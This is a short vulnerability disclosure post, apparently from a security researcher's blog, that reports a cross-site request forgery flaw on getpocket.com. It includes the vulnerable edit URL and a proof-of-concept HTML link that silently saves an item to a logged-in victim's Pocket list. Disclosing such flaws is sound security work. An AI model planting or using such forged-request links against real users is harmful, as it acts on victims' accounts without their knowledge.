Tags
0day-exploit, Articles, Bug Bounty, Computer Science, Cross-Site Request Forgery, CSRF, cyber-intelligence, GetPocket, getpocket.com, Hacker Prevent, internet, IT-news, jing wang, singapore, vulnerability, Web Security
GetPocket getpocket.com CSRF (Cross-Site Request Forgery ) Web Security Vulnerability
Domain:
getpocket.com
“Pocket was founded in 2007 by Nate Weiner to help people save interesting articles, videos and more from the web for later enjoyment. Once saved to Pocket, the list of content is visible on any device — phone, tablet or computer. It can be viewed while waiting in line, on the couch, during commutes or travel — even offline. The world’s leading save-for-later service currently has more than 17 million registered users and is integrated into more than 1500 apps including Flipboard, Twitter and Zite. It is available for major devices and platforms including iPad, iPhone, Android, Mac, Kindle Fire, Kobo, Google Chrome, Safari, Firefox, Opera and Windows.” (From: https://getpocket.com/about)
https://getpocket.com/edit?url=http%3A%2F%2Fwpshout.com%2Fchange-wordpress-theme-external-php&title=
Vulnerable URL:
https://getpocket.com/edit?url=http%3A%2F%2Fwpshout.com%2Fchange-wordpress-theme-external-php&title=
Use a website created by me for the following tests. The website is “http://itinfotech.tumblr.com/“. Suppose that this website is malicious. If it contains the following link, attackers can post any message as they like.
<a href=”https://getpocket.com/edit?url=http%3A%2F%2Fmake.wordpress.org%2Fcore%2F2014%2F01%2F15%2Fgit-mirrors-for-wordpress&title=csrf test”>getpocket csrf test</a> [1]
When a logged victim clicks the link ([1]), a new item will be successfully saved to his/her “Pocket” without his/her notice. An attack happens.
Attachments area
Preview YouTube video GetPocket Online Website CSRF (Cross-Site Request Forgery ) Web Security Vulnerability
GetPocket Online Website CSRF (Cross-Site Request Forgery ) Web Security Vulnerability